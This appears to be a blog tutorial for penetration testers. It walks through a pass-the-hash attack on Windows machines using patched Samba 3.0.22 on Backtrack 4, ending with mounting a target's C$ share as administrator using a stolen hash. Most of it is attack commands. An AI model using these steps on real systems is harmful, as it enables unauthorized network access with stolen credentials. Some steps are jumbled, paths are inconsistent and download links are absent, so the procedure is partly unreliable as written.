Say you were conducting a penetration test on Company X and you were unable to crack the administrator password. Now, like most organizations, Company X is using the same administrator password on all of its machines. So gaining access to this password would allow you to pwn the entire network. Now lets say that Company X believes strongly in security, and has a 20 character random password for their administrator password. So now you're screwed right? Wrong.
By having access to just one machine that holds this master account that is present on all machines (the administrator account in this example), you are able to utilize a pass-the-hash attack by 'passing' just the hash to every other machines on the network. By receiving the hash, Windows believes that you have successfully authenticated and provides you access to the host. Kinda cool huh?
Now that I've given you some background, here's how you go about setting it up on Backtrack 4. There are a few tweaks that need to be made in order for this to work on Backtrack 4.
Pass the Hash Attack Tutorial for Backtrack 4 Users:
1. Download Samba 3.0.22:
2. Download both of the Foofus Samba patches:
3. Extract the samba archive where you would like to access Samba from. I've chosen /opt/
4. From the directory where you have installed Samba (/opt/ for me), patch the appropriate files
# cd /opt/5. Configure Samba with smbmount
# patch -p0 <samba-3.0.22-add-user.patch
# patch -p0 <samba-3.0.22-passhash.patch
# cd /opt/samba3.0.22/source
# ./configure --with-smbmount
6. Compile/Install Samba (still in the /opt/samba3.0.22/source/ directory)
# make install
7. Create a mount point in order to mount the Windows share
# mkdir /mnt/target
8. Alter the fstab file to allow /mnt/target to be mounted
# pico /etc/fstab
At the bottom of the file add this entry:
none /mnt/target tmpfs defaults 0 0
9. Copy smb.conf to the correct directory
# cp /opt/samba-3.0.22/packaging/Debian/debian-woody/smb.conf /usr/local/samba/lib/smb.conf
10. Mount the target directory
# mount /mnt/target
11. Add your compromised hash to the SMBHASH environment variable
# export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"
Note: The format for this should be "LMHASH:NTHASH"
12. Implement your pass-the-hash attack
# cd /opt/samba3.0.22/source/bin
Usage: smbmount //target-ipaddress/sharename /mount/point -o username=username-associated-with-hash-here
# ./smbmount //10.0.0.100/C$ /mnt/target -o username=administrator
13. Type an arbitrary password
At this point would be asked to supply a password. Type anything you want here -- just make sure its not blank. So, for example, you could just type 'blah' and hit return.14. Check to see that you have successfully mapped the Windows share
# ls /mnt/target
If you would like a video tutorial on the pass-the-hash technique, please see John Strand's video: